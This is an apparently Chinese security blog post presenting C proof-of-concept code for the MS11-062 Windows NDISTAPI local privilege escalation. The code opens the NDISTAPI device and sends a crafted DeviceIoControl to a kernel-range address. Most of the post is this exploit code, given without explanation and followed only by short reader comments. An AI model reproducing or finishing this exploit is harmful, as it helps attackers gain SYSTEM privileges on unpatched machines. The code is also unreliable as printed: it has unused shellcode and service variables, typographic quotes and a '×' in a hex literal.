Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062) | SoftRCE.net

Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)

#include “stdio.h”
#include “windows.h”

#define NTSTATUS int

int main(int argc, char* argv[])
{

PULONG pShellcode;
char InputBuffer[4]={0};
ULONG AllocationSize,dwReturnSize;
HANDLE dev_handle;

SC_HANDLE hscmHandle = NULL;
SC_HANDLE hscDriver = NULL;

PROCESS_INFORMATION pi;
STARTUPINFOA stStartup;

printf(“\n Microsoft Ndistapi.sys Local Privilege Escalation Vulnerability Exploit \n\n”);

dev_handle = CreateFile(“\\\\.\\NDISTAPI” ,GENERIC_READ | GENERIC_WRITE ,0,NULL,CREATE_ALWAYS ,0,0);

DeviceIoControl( dev_handle, 0x8fff23d4, InputBuffer,4,(PVOID)0×80000000,0,&dwReturnSize, NULL);

return 1;
}

Posted on 2011-09-13 at 2:10 下午 | Filed: 倚天屠龙（Vulnerability） | Tags: MS11-062
Entry RSS 2.0 feed | Leave a Trackback | Post a comment |

随机日志

2008年11月16日 -- [转载]在英特尔软件网络博客上看到的
2010年01月12日 -- MS07-014调试手记
2010年04月21日 -- WinMount mou文件格式溢出漏洞分析
2011年03月21日 -- QQplayer Memory Corruption Vulnerability
2009年05月15日 -- ActiveX 控件组件的Fuzz和利用
2008年10月15日 -- About Handling Nmi
2008年10月22日 -- 绕过主动防御的代码注入方法一点思考
2010年02月10日 -- How to adjust the Ace of device object
2010年05月7日 -- IoRegisterDriverReinitialization 和IoRegisterBootDriverReinitialization
2009年02月1日 -- SoftRCE的Mail Server开通了！

5 Responses to “Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)”

ayarei 说道：

2011年09月13日 4:09 下午

顶~

[回复]
Frears 说道：

2011年09月13日 10:00 下午

必须顶。

[回复]
123 说道：

2011年10月17日 7:55 下午

你好fsdfsdf

[回复]
admin 说道：

2012年01月3日 7:50 下午

为什么就是看不懂

[回复]
校园自助打印复印说道：

2012年02月3日 2:00 下午

代码什么的最烦人了

[回复]

Post a Comment